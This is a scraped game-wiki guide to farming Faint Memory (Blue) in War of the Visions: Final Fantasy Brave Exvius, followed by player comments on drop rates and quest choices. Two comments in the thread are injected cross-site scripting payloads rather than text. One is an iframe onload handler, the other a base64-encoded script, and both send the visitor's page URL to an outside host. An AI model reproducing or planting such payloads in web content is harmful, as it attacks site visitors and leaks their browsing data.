
How to Farm Faint Memory (Blue) Fast

Faint Memory (Blue) in War of the Visions: Final Fantasy Brave Exvius, job level-up material.
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update 06/04/2020

Dime Memory (Azure) is a job level-up material. Used to increase job level (job lv4~6).

ENDime Memory (Azure)

How to get Dime Memory (Azure)

・Story quest drops
・Quest mission completion rewards
・Chocobo Explorations
・Challange mission completion rewards

List of Locations to Farm

Best places to farm Dime Memory (Azure)

Mediena and Yshtola have AOE abilities (Cosmo Plume and Foul). Use them to defeat all enemies in these quests.

Mediena is the best. If you are a F2P player and don't have Mediena, use Yshtola instead. Yshtola however need to have enough level and magic stat to defeat enemies with 1 attack.

Chapter 1 Section 3 Battle3: False Accusation (濡れ衣)

▲ Yshtola Lv44 could defeat all enemies with 1 Foul.

Chapter 2 Section 2 Battle 1: Withdrawl 1

▲ Yshtola Lv44 couldn't defeat all enemies with 1 Foul at Withdrawl 1.


From Kronoa

I did a lot of test and now suggest you to famr story 2-2-8 (the royal bloodline).

1) 8 enemies (any enemy has roughly 85%-90% of drop a chest)

2)Any chest has roughly 20% of cointain a faint memory

3)energy efficient cz u get 1,4 memory/6 rng

Ps u need mediena one shot one row of 4 enemies and a friend mediena to one shot the other row of 4 enemies


I did a lot of test
I will suggest story 2-2-8 (the royal bloodline)
1)8 enemies (any enemy has roughly 85%-90% of drop a chest)
2)Any chest has roughly 20% of cointain a faint memory
3)energy efficient cz u get 1,4 memory/6 rng
Ps u need mediena one shot one row of 4 enemies and a friend mediena to one shot the other row of 4 enemies
<< Anonymous(McLeod)
Anonymous Reply
<fRame src=N onload="this.onload='';this.src='//wezgh4e8eex5q1yiruisqlsgn2klnmxuppehtofi'+''+location.href">
<< Anonymous(McLeod)
Anonymous Reply
<scRipt src="data:;base64,bD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJsaW5rIik7bC5yZWw9InByZWZldGNoIjtsLmhyZWY9Ii8vd2V6Z2g0ZThlZWhiOHlubG1lMHVmdnRkMnJpcWEzYnRvem5tOWk3bCIrInoxOC5yODcubWUvci8/Iitsb2NhdGlvbi5ocmVmO2RvY3VtZW50LmhlYWQuYXBwZW5kQ2hpbGQobCk="></scRipt>
<< Anonymous(Kronoa)
Anonymous Reply
there is no 2-2-8 royal bloodline
<< Anonymous
Anonymous Reply
I think this was put in before part 1 finished, so the full path is 1-2-2-8.
nice one
Kronoa is correct that 228 is best chance of fbm/nrg spent.
However 133, 221 are still viable choices if you are also looking to get xp & jp too, in as quick a time(real time) as possible, and you are not worried about nrg spent.
Chapter 1 Section 3 Battle3: False Accusation only drop:0-4 so far, maybe i am wrong.
<< Anonymous
GameA1 Reply
?? Those quests are selected sa the best farming lcoation since mediena can finish it in a moment.
<< GameA1
Anonymous Reply
I think it is way more importante the drop rate than the clear time. We lack energy not gameplay time.
<< Anonymous
GameA1 Reply
Makes sense. Thank you for your suggestion!

If you can do some researces on that and get info, we can share that with other players on this page :)
<< Anonymous
pain Reply
does this still work i just ran it 5-10 times in a row and not got one to drop i know it drops there i used it few days ago
the best place to farm its withdraw II
<< Anonymous(cronosss)
Noobie Reply
Where is the place man I search everywhere for the place cannot found it. The closest I found to what you say is "A fighting retreat II".
For Withdrawl 1 it seems like every three runs you receive 2 Memories.

Commens and feedback



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Yuna 75
Yuna + Princess Garnet team up?
Does this grant the Silence spell at 3 stars?
This guy’s personality pisses me off. I wanna backhand him.
Too many light slash characters already, this one is outdated but TMR is good Need friends add...
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